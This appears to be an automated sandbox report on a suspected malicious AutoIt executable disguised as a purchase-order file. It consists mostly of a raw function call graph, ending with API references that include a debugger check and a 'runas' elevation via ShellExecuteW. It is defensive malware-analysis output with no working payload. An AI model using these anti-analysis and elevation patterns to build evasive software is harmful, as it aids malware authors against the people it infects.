86899 426c2b 86895->86899 87598 403ea0 52 API calls __cinit 86896->87598 87603 4534e3 52 API calls 86897->87603 86903 40c321 86898->86903 86904 426c5a 86898->86904 86901 426c4b 86899->86901 86902 426c2e 86899->86902 87601 4534e3 52 API calls 86901->87601 86910 40c2de 86902->86910 87600 4534e3 52 API calls 86902->87600 87599 403ea0 52 API calls __cinit 86903->87599 87602 4534e3 52 API calls 86904->87602 86910->86691 86912 401a30 86911->86912 86913 401a17 86911->86913 86915 402160 52 API calls 86912->86915 86914 401a2d 86913->86914 87604 403c30 52 API calls _memmove 86913->87604 86914->86695 86917 401a3d 86915->86917 86917->86695 86919 411523 86918->86919 86920 4114ba 86918->86920 87607 4113a8 58 API calls 3 library calls 86919->87607 86925 40200c 86920->86925 87605 417f77 46 API calls __getptd_noexit 86920->87605 86923 4114c6 87606 417f25 10 API calls __fptostr 86923->87606 86925->86698 86925->86699 86926->86726 86927->86728 86928->86734 86929->86734 86931 4026f0 52 API calls 86930->86931 86932 401c97 86931->86932 86932->86859 86933->86869 86934->86868 86995 40f6f0 86935->86995 86937 40f77b _strcat moneypunct 87003 40f850 86937->87003 86942 427c2a 87032 414d04 86942->87032 86944 40f7fc 86944->86942 86945 40f804 86944->86945 87019 414a46 86945->87019 86950 40f80e 86950->86873 86954 4528bd 86950->86954 86951 427c59 87038 414fe2 86951->87038 86953 427c79 86955 4150d1 _fseek 81 API calls 86954->86955 86956 452930 86955->86956 87538 452719 86956->87538 86959 452948 86959->86875 86960 414d04 __fread_nolock 61 API calls 86961 452966 86960->86961 86962 414d04 __fread_nolock 61 API calls 86961->86962 86963 452976 86962->86963 86964 414d04 __fread_nolock 61 API calls 86963->86964 86965 45298f 86964->86965 86966 414d04 __fread_nolock 61 API calls 86965->86966 86967 4529aa 86966->86967 86968 4150d1 _fseek 81 API calls 86967->86968 86969 4529c4 86968->86969 86970 4135bb _malloc 46 API calls 86969->86970 86971 4529cf 86970->86971 86972 4135bb _malloc 46 API calls 86971->86972 
86973 4529db 86972->86973 86974 414d04 __fread_nolock 61 API calls 86973->86974 86975 4529ec 86974->86975 86976 44afef GetSystemTimeAsFileTime 86975->86976 86977 452a00 86976->86977 86978 452a36 86977->86978 86979 452a13 86977->86979 86981 452aa5 86978->86981 86982 452a3c 86978->86982 86980 413748 _free 46 API calls 86979->86980 86984 452a1c 86980->86984 86983 413748 _free 46 API calls 86981->86983 87544 44b1a9 86982->87544 86986 452aa3 86983->86986 86987 413748 _free 46 API calls 86984->86987 86986->86875 86989 452a25 86987->86989 86988 452a9d 86990 413748 _free 46 API calls 86988->86990 86989->86875 86990->86986 86992 431e64 86991->86992 86993 431e6a 86991->86993 86994 414a46 __fcloseall 82 API calls 86992->86994 86993->86876 86994->86993 86996 425de2 86995->86996 86998 40f6fc _wcslen 86995->86998 86996->86937 86997 40f710 WideCharToMultiByte 86999 40f756 86997->86999 87000 40f728 86997->87000 86998->86997 86999->86937 87001 4115d7 52 API calls 87000->87001 87002 40f735 WideCharToMultiByte 87001->87002 87002->86937 87005 40f85d __setmbcp_nolock _strlen 87003->87005 87006 40f7ab 87005->87006 87051 414db8 87005->87051 87007 4149c2 87006->87007 87066 414904 87007->87066 87009 40f7e9 87009->86942 87010 40f5c0 87009->87010 87011 40f5cd _strcat __write_nolock _memmove 87010->87011 87012 414d04 __fread_nolock 61 API calls 87011->87012 87013 40f691 __tzset_nolock 87011->87013 87015 425d11 87011->87015 87154 4150d1 87011->87154 87012->87011 87013->86944 87016 4150d1 _fseek 81 API calls 87015->87016 87017 425d33 87016->87017 87018 414d04 __fread_nolock 61 API calls 87017->87018 87018->87013 87020 414a52 __mtinitlocknum 87019->87020 87021 414a64 87020->87021 87022 414a79 87020->87022 87294 417f77 46 API calls __getptd_noexit 87021->87294 87025 415471 __lock_file 47 API calls 87022->87025 87030 414a74 __mtinitlocknum 87022->87030 87024 414a69 87295 417f25 10 API calls __fptostr 87024->87295 87026 414a92 87025->87026 87278 4149d9 87026->87278 87030->86950 87363 414c76 
87032->87363 87034 414d1c 87035 44afef 87034->87035 87531 442c5a 87035->87531 87037 44b00d 87037->86951 87039 414fee __mtinitlocknum 87038->87039 87040 414ffa 87039->87040 87041 41500f 87039->87041 87535 417f77 46 API calls __getptd_noexit 87040->87535 87043 415471 __lock_file 47 API calls 87041->87043 87045 415017 87043->87045 87044 414fff 87536 417f25 10 API calls __fptostr 87044->87536 87047 414e4e __ftell_nolock 51 API calls 87045->87047 87048 415024 87047->87048 87537 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87048->87537 87050 41500a __mtinitlocknum 87050->86953 87052 414dd6 87051->87052 87053 414deb 87051->87053 87062 417f77 46 API calls __getptd_noexit 87052->87062 87053->87052 87055 414df2 87053->87055 87064 41b91b 79 API calls 12 library calls 87055->87064 87056 414ddb 87063 417f25 10 API calls __fptostr 87056->87063 87059 414e18 87060 414de6 87059->87060 87065 418f98 77 API calls 5 library calls 87059->87065 87060->87005 87062->87056 87063->87060 87064->87059 87065->87060 87069 414910 __mtinitlocknum 87066->87069 87067 414923 87122 417f77 46 API calls __getptd_noexit 87067->87122 87069->87067 87070 414951 87069->87070 87085 41d4d1 87070->87085 87071 414928 87123 417f25 10 API calls __fptostr 87071->87123 87074 414956 87075 41496a 87074->87075 87076 41495d 87074->87076 87078 414992 87075->87078 87079 414972 87075->87079 87124 417f77 46 API calls __getptd_noexit 87076->87124 87102 41d218 87078->87102 87125 417f77 46 API calls __getptd_noexit 87079->87125 87080 414933 __mtinitlocknum @_EH4_CallFilterFunc@8 87080->87009 87086 41d4dd __mtinitlocknum 87085->87086 87087 4182cb __lock 46 API calls 87086->87087 87088 41d4eb 87087->87088 87089 41d567 87088->87089 87097 418209 __mtinitlocknum 46 API calls 87088->87097 87100 41d560 87088->87100 87130 4154b2 47 API calls __lock 87088->87130 87131 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87088->87131 87091 416b04 __malloc_crt 46 API calls 87089->87091 87092 41d56e 87091->87092 87094 
41d57c InitializeCriticalSectionAndSpinCount 87092->87094 87092->87100 87093 41d5f0 __mtinitlocknum 87093->87074 87095 41d59c 87094->87095 87096 41d5af EnterCriticalSection 87094->87096 87099 413748 _free 46 API calls 87095->87099 87096->87100 87097->87088 87099->87100 87127 41d5fb 87100->87127 87103 41d23a 87102->87103 87104 41d255 87103->87104 87116 41d26c __wopenfile 87103->87116 87136 417f77 46 API calls __getptd_noexit 87104->87136 87105 41d421 87108 41d47a 87105->87108 87109 41d48c 87105->87109 87107 41d25a 87137 417f25 10 API calls __fptostr 87107->87137 87141 417f77 46 API calls __getptd_noexit 87108->87141 87133 422bf9 87109->87133 87113 41d47f 87142 417f25 10 API calls __fptostr 87113->87142 87114 41499d 87126 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87114->87126 87116->87105 87116->87108 87138 41341f 58 API calls 2 library calls 87116->87138 87118 41d41a 87118->87105 87139 41341f 58 API calls 2 library calls 87118->87139 87120 41d439 87120->87105 87140 41341f 58 API calls 2 library calls 87120->87140 87122->87071 87123->87080 87124->87080 87125->87080 87126->87080 87132 4181f2 LeaveCriticalSection 87127->87132 87129 41d602 87129->87093 87130->87088 87131->87088 87132->87129 87143 422b35 87133->87143 87135 422c14 87135->87114 87136->87107 87137->87114 87138->87118 87139->87120 87140->87105 87141->87113 87142->87114 87145 422b41 __mtinitlocknum 87143->87145 87144 422b54 87146 417f77 __fptostr 46 API calls 87144->87146 87145->87144 87147 422b8a 87145->87147 87148 422b59 87146->87148 87149 422400 __tsopen_nolock 109 API calls 87147->87149 87150 417f25 __fptostr 10 API calls 87148->87150 87151 422ba4 87149->87151 87153 422b63 __mtinitlocknum 87150->87153 87152 422bcb __wsopen_helper LeaveCriticalSection 87151->87152 87152->87153 87153->87135 87157 4150dd __mtinitlocknum 87154->87157 87155 4150e9 87185 417f77 46 API calls __getptd_noexit 87155->87185 87157->87155 87158 41510f 87157->87158 87167 415471 87158->87167 87159 4150ee 87186 417f25 10 
API calls __fptostr 87159->87186 87166 4150f9 __mtinitlocknum 87166->87011 87168 415483 87167->87168 87169 4154a5 EnterCriticalSection 87167->87169 87168->87169 87170 41548b 87168->87170 87172 415117 87169->87172 87171 4182cb __lock 46 API calls 87170->87171 87171->87172 87173 415047 87172->87173 87174 415067 87173->87174 87175 415057 87173->87175 87180 415079 87174->87180 87188 414e4e 87174->87188 87243 417f77 46 API calls __getptd_noexit 87175->87243 87179 41505c 87187 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87179->87187 87205 41443c 87180->87205 87183 4150b9 87218 41e1f4 87183->87218 87185->87159 87186->87166 87187->87166 87189 414e61 87188->87189 87190 414e79 87188->87190 87244 417f77 46 API calls __getptd_noexit 87189->87244 87191 414139 __flswbuf 46 API calls 87190->87191 87193 414e80 87191->87193 87196 41e1f4 __write 51 API calls 87193->87196 87194 414e66 87245 417f25 10 API calls __fptostr 87194->87245 87198 414e97 87196->87198 87197 414e71 87197->87180 87198->87197 87199 414f09 87198->87199 87201 414ec9 87198->87201 87246 417f77 46 API calls __getptd_noexit 87199->87246 87201->87197 87202 41e1f4 __write 51 API calls 87201->87202 87203 414f64 87202->87203 87203->87197 87204 41e1f4 __write 51 API calls 87203->87204 87204->87197 87206 414455 87205->87206 87210 414477 87205->87210 87207 414139 __flswbuf 46 API calls 87206->87207 87206->87210 87208 414470 87207->87208 87247 41b7b2 77 API calls 6 library calls 87208->87247 87211 414139 87210->87211 87212 414145 87211->87212 87213 41415a 87211->87213 87248 417f77 46 API calls __getptd_noexit 87212->87248 87213->87183 87215 41414a 87249 417f25 10 API calls __fptostr 87215->87249 87217 414155 87217->87183 87219 41e200 __mtinitlocknum 87218->87219 87220 41e223 87219->87220 87221 41e208 87219->87221 87223 41e22f 87220->87223 87227 41e269 87220->87227 87270 417f8a 46 API calls __getptd_noexit 87221->87270 87272 417f8a 46 API calls __getptd_noexit 87223->87272 87224 41e20d 87271 417f77 46 API calls 
__getptd_noexit 87224->87271 87226 41e234 87273 417f77 46 API calls __getptd_noexit 87226->87273 87250 41ae56 87227->87250 87231 41e23c 87274 417f25 10 API calls __fptostr 87231->87274 87232 41e26f 87234 41e291 87232->87234 87235 41e27d 87232->87235 87275 417f77 46 API calls __getptd_noexit 87234->87275 87260 41e17f 87235->87260 87236 41e215 __mtinitlocknum 87236->87179 87239 41e289 87277 41e2c0 LeaveCriticalSection __unlock_fhandle 87239->87277 87240 41e296 87276 417f8a 46 API calls __getptd_noexit 87240->87276 87243->87179 87244->87194 87245->87197 87246->87197 87247->87210 87248->87215 87249->87217 87251 41ae62 __mtinitlocknum 87250->87251 87252 41aebc 87251->87252 87253 4182cb __lock 46 API calls 87251->87253 87254 41aec1 EnterCriticalSection 87252->87254 87257 41aede __mtinitlocknum 87252->87257 87255 41ae8e 87253->87255 87254->87257 87256 41ae97 InitializeCriticalSectionAndSpinCount 87255->87256 87258 41aeaa 87255->87258 87256->87258 87257->87232 87259 41aeec ___lock_fhandle LeaveCriticalSection 87258->87259 87259->87252 87261 41aded __chsize_nolock 46 API calls 87260->87261 87262 41e18e 87261->87262 87263 41e1a4 SetFilePointer 87262->87263 87264 41e194 87262->87264 87266 41e1c3 87263->87266 87267 41e1bb GetLastError 87263->87267 87265 417f77 __fptostr 46 API calls 87264->87265 87268 41e199 87265->87268 87266->87268 87269 417f9d __dosmaperr 46 API calls 87266->87269 87267->87266 87268->87239 87269->87268 87270->87224 87271->87236 87272->87226 87273->87231 87274->87236 87275->87240 87276->87239 87277->87236 87279 4149ea 87278->87279 87281 4149fe 87278->87281 87324 417f77 46 API calls __getptd_noexit 87279->87324 87282 4149fa 87281->87282 87284 41443c __flush 77 API calls 87281->87284 87296 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87282->87296 87283 4149ef 87325 417f25 10 API calls __fptostr 87283->87325 87286 414a0a 87284->87286 87297 41d8c2 87286->87297 87289 414139 __flswbuf 46 API calls 87290 414a18 87289->87290 87301 41d7fe 87290->87301 
87292 414a1e 87292->87282 87293 413748 _free 46 API calls 87292->87293 87293->87282 87294->87024 87295->87030 87296->87030 87298 41d8d2 87297->87298 87300 414a12 87297->87300 87299 413748 _free 46 API calls 87298->87299 87298->87300 87299->87300 87300->87289 87302 41d80a __mtinitlocknum 87301->87302 87303 41d812 87302->87303 87304 41d82d 87302->87304 87341 417f8a 46 API calls __getptd_noexit 87303->87341 87305 41d839 87304->87305 87310 41d873 87304->87310 87343 417f8a 46 API calls __getptd_noexit 87305->87343 87308 41d817 87342 417f77 46 API calls __getptd_noexit 87308->87342 87309 41d83e 87344 417f77 46 API calls __getptd_noexit 87309->87344 87313 41ae56 ___lock_fhandle 48 API calls 87310->87313 87315 41d879 87313->87315 87314 41d846 87345 417f25 10 API calls __fptostr 87314->87345 87317 41d893 87315->87317 87318 41d887 87315->87318 87346 417f77 46 API calls __getptd_noexit 87317->87346 87326 41d762 87318->87326 87321 41d81f __mtinitlocknum 87321->87292 87322 41d88d 87347 41d8ba LeaveCriticalSection __unlock_fhandle 87322->87347 87324->87283 87325->87282 87348 41aded 87326->87348 87328 41d7c8 87361 41ad67 47 API calls 2 library calls 87328->87361 87329 41d772 87329->87328 87330 41d7a6 87329->87330 87332 41aded __chsize_nolock 46 API calls 87329->87332 87330->87328 87333 41aded __chsize_nolock 46 API calls 87330->87333 87335 41d79d 87332->87335 87336 41d7b2 CloseHandle 87333->87336 87334 41d7d0 87337 41d7f2 87334->87337 87362 417f9d 46 API calls 3 library calls 87334->87362 87339 41aded __chsize_nolock 46 API calls 87335->87339 87336->87328 87340 41d7be GetLastError 87336->87340 87337->87322 87339->87330 87340->87328 87341->87308 87342->87321 87343->87309 87344->87314 87345->87321 87346->87322 87347->87321 87349 41adfa 87348->87349 87351 41ae12 87348->87351 87350 417f8a __free_osfhnd 46 API calls 87349->87350 87353 41adff 87350->87353 87352 417f8a __free_osfhnd 46 API calls 87351->87352 87355 41ae51 87351->87355 87354 41ae23 87352->87354 87356 417f77 __fptostr 46 
API calls 87353->87356 87357 417f77 __fptostr 46 API calls 87354->87357 87355->87329 87358 41ae07 87356->87358 87359 41ae2b 87357->87359 87358->87329 87360 417f25 __fptostr 10 API calls 87359->87360 87360->87358 87361->87334 87362->87337 87364 414c82 __mtinitlocknum 87363->87364 87365 414cc3 87364->87365 87366 414c96 __setmbcp_nolock 87364->87366 87367 414cbb __mtinitlocknum 87364->87367 87368 415471 __lock_file 47 API calls 87365->87368 87390 417f77 46 API calls __getptd_noexit 87366->87390 87367->87034 87370 414ccb 87368->87370 87376 414aba 87370->87376 87371 414cb0 87391 417f25 10 API calls __fptostr 87371->87391 87377 414af2 87376->87377 87380 414ad8 __setmbcp_nolock 87376->87380 87392 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87377->87392 87378 414ae2 87443 417f77 46 API calls __getptd_noexit 87378->87443 87380->87377 87380->87378 87383 414b2d 87380->87383 87383->87377 87384 414c38 __setmbcp_nolock 87383->87384 87385 414139 __flswbuf 46 API calls 87383->87385 87393 41dfcc 87383->87393 87423 41d8f3 87383->87423 87445 41e0c2 46 API calls 3 library calls 87383->87445 87446 417f77 46 API calls __getptd_noexit 87384->87446 87385->87383 87389 414ae7 87444 417f25 10 API calls __fptostr 87389->87444 87390->87371 87391->87367 87392->87367 87394 41dfd8 __mtinitlocknum 87393->87394 87395 41dfe0 87394->87395 87396 41dffb 87394->87396 87516 417f8a 46 API calls __getptd_noexit 87395->87516 87398 41e007 87396->87398 87402 41e041 87396->87402 87518 417f8a 46 API calls __getptd_noexit 87398->87518 87400 41dfe5 87517 417f77 46 API calls __getptd_noexit 87400->87517 87401 41e00c 87519 417f77 46 API calls __getptd_noexit 87401->87519 87405 41e063 87402->87405 87406 41e04e 87402->87406 87409 41ae56 ___lock_fhandle 48 API calls 87405->87409 87521 417f8a 46 API calls __getptd_noexit 87406->87521 87407 41e014 87520 417f25 10 API calls __fptostr 87407->87520 87410 41e069 87409->87410 87412 41e077 87410->87412 87413 41e08b 87410->87413 87411 41e053 87522 417f77 46 API 
calls __getptd_noexit 87411->87522 87447 41da15 87412->87447 87523 417f77 46 API calls __getptd_noexit 87413->87523 87416 41dfed __mtinitlocknum 87416->87383 87419 41e083 87525 41e0ba LeaveCriticalSection __unlock_fhandle 87419->87525 87420 41e090 87524 417f8a 46 API calls __getptd_noexit 87420->87524 87424 41d900 87423->87424 87428 41d915 87423->87428 87529 417f77 46 API calls __getptd_noexit 87424->87529 87426 41d905 87530 417f25 10 API calls __fptostr 87426->87530 87429 41d94a 87428->87429 87434 41d910 87428->87434 87526 420603 87428->87526 87431 414139 __flswbuf 46 API calls 87429->87431 87432 41d95e 87431->87432 87433 41dfcc __read 59 API calls 87432->87433 87435 41d965 87433->87435 87434->87383 87435->87434 87436 414139 __flswbuf 46 API calls 87435->87436 87437 41d988 87436->87437 87437->87434 87438 414139 __flswbuf 46 API calls 87437->87438 87439 41d994 87438->87439 87439->87434 87440 414139 __flswbuf 46 API calls 87439->87440 87441 41d9a1 87440->87441 87442 414139 __flswbuf 46 API calls 87441->87442 87442->87434 87443->87389 87444->87377 87445->87383 87446->87389 87448 41da31 87447->87448 87449 41da4c 87447->87449 87450 417f8a __free_osfhnd 46 API calls 87448->87450 87451 41da5b 87449->87451 87453 41da7a 87449->87453 87452 41da36 87450->87452 87454 417f8a __free_osfhnd 46 API calls 87451->87454 87456 417f77 __fptostr 46 API calls 87452->87456 87455 41da98 87453->87455 87470 41daac 87453->87470 87457 41da60 87454->87457 87458 417f8a __free_osfhnd 46 API calls 87455->87458 87467 41da3e 87456->87467 87460 417f77 __fptostr 46 API calls 87457->87460 87462 41da9d 87458->87462 87459 41db02 87461 417f8a __free_osfhnd 46 API calls 87459->87461 87463 41da67 87460->87463 87465 41db07 87461->87465 87466 417f77 __fptostr 46 API calls 87462->87466 87464 417f25 __fptostr 10 API calls 87463->87464 87464->87467 87468 417f77 __fptostr 46 API calls 87465->87468 87469 41daa4 87466->87469 87467->87419 87468->87469 87473 417f25 __fptostr 10 API calls 87469->87473 87470->87459 
87470->87467 87471 41dae1 87470->87471 87472 41db1b 87470->87472 87471->87459 87478 41daec ReadFile 87471->87478 87475 416b04 __malloc_crt 46 API calls 87472->87475 87473->87467 87479 41db31 87475->87479 87476 41dc17 87477 41df8f GetLastError 87476->87477 87485 41dc2b 87476->87485 87480 41de16 87477->87480 87481 41df9c 87477->87481 87478->87476 87478->87477 87482 41db59 87479->87482 87483 41db3b 87479->87483 87489 417f9d __dosmaperr 46 API calls 87480->87489 87495 41dd9b 87480->87495 87487 417f77 __fptostr 46 API calls 87481->87487 87486 420494 __lseeki64_nolock 48 API calls 87482->87486 87484 417f77 __fptostr 46 API calls 87483->87484 87488 41db40 87484->87488 87485->87495 87496 41dc47 87485->87496 87499 41de5b 87485->87499 87490 41db67 87486->87490 87491 41dfa1 87487->87491 87493 417f8a __free_osfhnd 46 API calls 87488->87493 87489->87495 87490->87478 87492 417f8a __free_osfhnd 46 API calls 87491->87492 87492->87495 87493->87467 87494 413748 _free 46 API calls 87494->87467 87495->87467 87495->87494 87497 41dcab ReadFile 87496->87497 87506 41dd28 87496->87506 87500 41dcc9 GetLastError 87497->87500 87508 41dcd3 87497->87508 87498 41ded0 ReadFile 87501 41deef GetLastError 87498->87501 87509 41def9 87498->87509 87499->87495 87499->87498 87500->87496 87500->87508 87501->87499 87501->87509 87502 41ddec MultiByteToWideChar 87502->87495 87503 41de10 GetLastError 87502->87503 87503->87480 87504 41dda3 87511 41dd60 87504->87511 87512 41ddda 87504->87512 87505 41dd96 87507 417f77 __fptostr 46 API calls 87505->87507 87506->87495 87506->87504 87506->87505 87506->87511 87507->87495 87508->87496 87513 420494 __lseeki64_nolock 48 API calls 87508->87513 87509->87499 87510 420494 __lseeki64_nolock 48 API calls 87509->87510 87510->87509 87511->87502 87514 420494 __lseeki64_nolock 48 API calls 87512->87514 87513->87508 87515 41dde9 87514->87515 87515->87502 87516->87400 87517->87416 87518->87401 87519->87407 87520->87416 87521->87411 87522->87407 87523->87420 87524->87419 
87525->87416 87527 416b04 __malloc_crt 46 API calls 87526->87527 87528 420618 87527->87528 87528->87429 87529->87426 87530->87434 87534 4148b3 GetSystemTimeAsFileTime __aulldiv 87531->87534 87533 442c6b 87533->87037 87534->87533 87535->87044 87536->87050 87537->87050 87543 45272f __tzset_nolock _wcscpy 87538->87543 87539 414d04 61 API calls __fread_nolock 87539->87543 87540 44afef GetSystemTimeAsFileTime 87540->87543 87541 4528a4 87541->86959 87541->86960 87542 4150d1 81 API calls _fseek 87542->87543 87543->87539 87543->87540 87543->87541 87543->87542 87545 44b1bc 87544->87545 87546 44b1ca 87544->87546 87547 4149c2 116 API calls 87545->87547 87548 44b1e1 87546->87548 87549 4149c2 116 API calls 87546->87549 87550 44b1d8 87546->87550 87547->87546 87579 4321a4 87548->87579 87551 44b2db 87549->87551 87550->86988 87551->87548 87556 44b2e9 87551->87556 87553 44b224 87554 44b253 87553->87554 87555 44b228 87553->87555 87583 43213d 87554->87583 87558 44b235 87555->87558 87561 414a46 __fcloseall 82 API calls 87555->87561 87557 44b2f6 87556->87557 87559 414a46 __fcloseall 82 API calls 87556->87559 87557->86988 87562 44b245 87558->87562 87564 414a46 __fcloseall 82 API calls 87558->87564 87559->87557 87561->87558 87562->86988 87563 44b25a 87565 44b260 87563->87565 87566 44b289 87563->87566 87564->87562 87568 44b26d 87565->87568 87571 414a46 __fcloseall 82 API calls 87565->87571 87593 44b0bf 87 API calls 87566->87593 87569 44b27d 87568->87569 87572 414a46 __fcloseall 82 API calls 87568->87572 87569->86988 87570 44b28f 87594 4320f8 46 API calls _free 87570->87594 87571->87568 87572->87569 87574 44b295 87575 44b2a2 87574->87575 87576 414a46 __fcloseall 82 API calls 87574->87576 87577 44b2b2 87575->87577 87578 414a46 __fcloseall 82 API calls 87575->87578 87576->87575 87577->86988 87578->87577 87580 4321cb 87579->87580 87582 4321b4 __tzset_nolock _memmove 87579->87582 87581 414d04 __fread_nolock 61 API calls 87580->87581 87581->87582 87582->87553 87584 4135bb _malloc 46 API calls 
87583->87584 87585 432150 87584->87585 87586 4135bb _malloc 46 API calls 87585->87586 87587 432162 87586->87587 87588 4135bb _malloc 46 API calls 87587->87588 87590 432174 87588->87590 87592 432189 87590->87592 87595 4320f8 46 API calls _free 87590->87595 87591 432198 87591->87563 87592->87563 87593->87570 87594->87574 87595->87591 87596->86890 87597->86891 87598->86910 87599->86910 87600->86910 87601->86904 87602->86910 87603->86910 87604->86914 87605->86923 87606->86925 87607->86925 87657 410160 87608->87657 87610 41012f GetFullPathNameW 87611 410147 moneypunct 87610->87611 87611->86744 87613 4102cb SHGetDesktopFolder 87612->87613 87614 410333 _wcsncpy 87612->87614 87613->87614 87615 4102e0 _wcsncpy 87613->87615 87614->86747 87615->87614 87616 41031c SHGetPathFromIDListW 87615->87616 87616->87614 87618 4101bb 87617->87618 87624 425f4a 87617->87624 87619 410160 52 API calls 87618->87619 87621 4101c7 87619->87621 87620 4114ab __wcsicoll 58 API calls 87620->87624 87661 410200 52 API calls 2 library calls 87621->87661 87623 4101d6 87662 410200 52 API calls 2 library calls 87623->87662 87624->87620 87626 425f6e 87624->87626 87626->86749 87627 4101e9 87627->86749 87629 40f760 128 API calls 87628->87629 87630 40f584 87629->87630 87631 429335 87630->87631 87632 40f58c 87630->87632 87633 4528bd 118 API calls 87631->87633 87634 40f598 87632->87634 87635 429358 87632->87635 87636 42934b 87633->87636 87687 4033c0 113 API calls 7 library calls 87634->87687 87688 434034 86 API calls _wprintf 87635->87688 87639 429373 87636->87639 87640 42934f 87636->87640 87644 4115d7 52 API calls 87639->87644 87643 431e58 82 API calls 87640->87643 87641 429369 87641->87639 87642 40f5b4 87642->86745 87643->87635 87656 4293c5 moneypunct 87644->87656 87645 42959c 87646 413748 _free 46 API calls 87645->87646 87647 4295a5 87646->87647 87648 431e58 82 API calls 87647->87648 87649 4295b1 87648->87649 87653 401b10 52 API calls 87653->87656 87656->87645 87656->87653 87663 444af8 87656->87663 87666 
44b41c 87656->87666 87673 402780 87656->87673 87681 4022d0 87656->87681 87689 44c7dd 64 API calls 3 library calls 87656->87689 87658 410167 _wcslen 87657->87658 87659 4115d7 52 API calls 87658->87659 87660 41017e _wcscpy 87659->87660 87660->87610 87661->87623 87662->87627 87664 4115d7 52 API calls 87663->87664 87665 444b27 _memmove 87664->87665 87665->87656 87667 44b429 87666->87667 87668 4115d7 52 API calls 87667->87668 87669 44b440 87668->87669 87670 44b45e 87669->87670 87671 401b10 52 API calls 87669->87671 87670->87656 87672 44b453 87671->87672 87672->87656 87674 402827 87673->87674 87677 402790 moneypunct _memmove 87673->87677 87676 4115d7 52 API calls 87674->87676 87675 4115d7 52 API calls 87678 402797 87675->87678 87676->87677 87677->87675 87679 4027bd 87678->87679 87680 4115d7 52 API calls 87678->87680 87679->87656 87680->87679 87682 4022e0 87681->87682 87684 40239d 87681->87684 87683 4115d7 52 API calls 87682->87683 87682->87684 87685 402320 moneypunct 87682->87685 87683->87685 87684->87656 87685->87684 87686 4115d7 52 API calls 87685->87686 87686->87685 87687->87642 87688->87641 87689->87656 87691 402539 moneypunct 87690->87691 87692 402417 87690->87692 87691->86753 87692->87691 87693 4115d7 52 API calls 87692->87693 87694 402443 87693->87694 87695 4115d7 52 API calls 87694->87695 87696 4024b4 87695->87696 87696->87691 87698 4022d0 52 API calls 87696->87698 87719 402880 87696->87719 87698->87696 87704 401566 87699->87704 87700 401794 87771 40e9a0 90 API calls 87700->87771 87703 4010a0 52 API calls 87703->87704 87704->87700 87704->87703 87705 40167a 87704->87705 87706 4017c0 87705->87706 87772 45e737 90 API calls 3 library calls 87705->87772 87706->86755 87708 40bc70 52 API calls 87707->87708 87709 40d451 87708->87709 87710 40d50f 87709->87710 87712 40d519 87709->87712 87713 40e0a0 52 API calls 87709->87713 87715 401b10 52 API calls 87709->87715 87717 427c01 87709->87717 87773 40f310 53 API calls 87709->87773 87774 40d860 91 API calls 87709->87774 87775 
                [Control-flow graph residue: the node/edge listing of the rendered control-flow graph is not reproduced here. API calls named on that graph: CharUpperBuffW, InterlockedIncrement, InterlockedDecrement, Sleep, VariantClear, VariantInit, VariantCopy, GetLastError, GetFileAttributesW, FindFirstFileW, FindClose, CloseHandle, CreateFileW, SetFilePointerEx, WriteFile, ReadFile, VirtualAlloc, VirtualProtect, GetPEB, GetCurrentProcess, TerminateProcess, ExitProcess, GetVersionExW, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, GetStdHandle, CreateThread, RegOpenKeyExW, RegQueryValueExW, RegCloseKey. CRT helpers named on the graph: _memmove, _wcslen, _wcscpy, _strcat, _malloc, __wcsicoll, __wsplitpath, __itow_s, __write_nolock, __cinit, moneypunct.]

                Control-flow Graph

                APIs
                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO# Q919240.exe,00000104,?), ref: 00401F4C
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO# Q919240.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
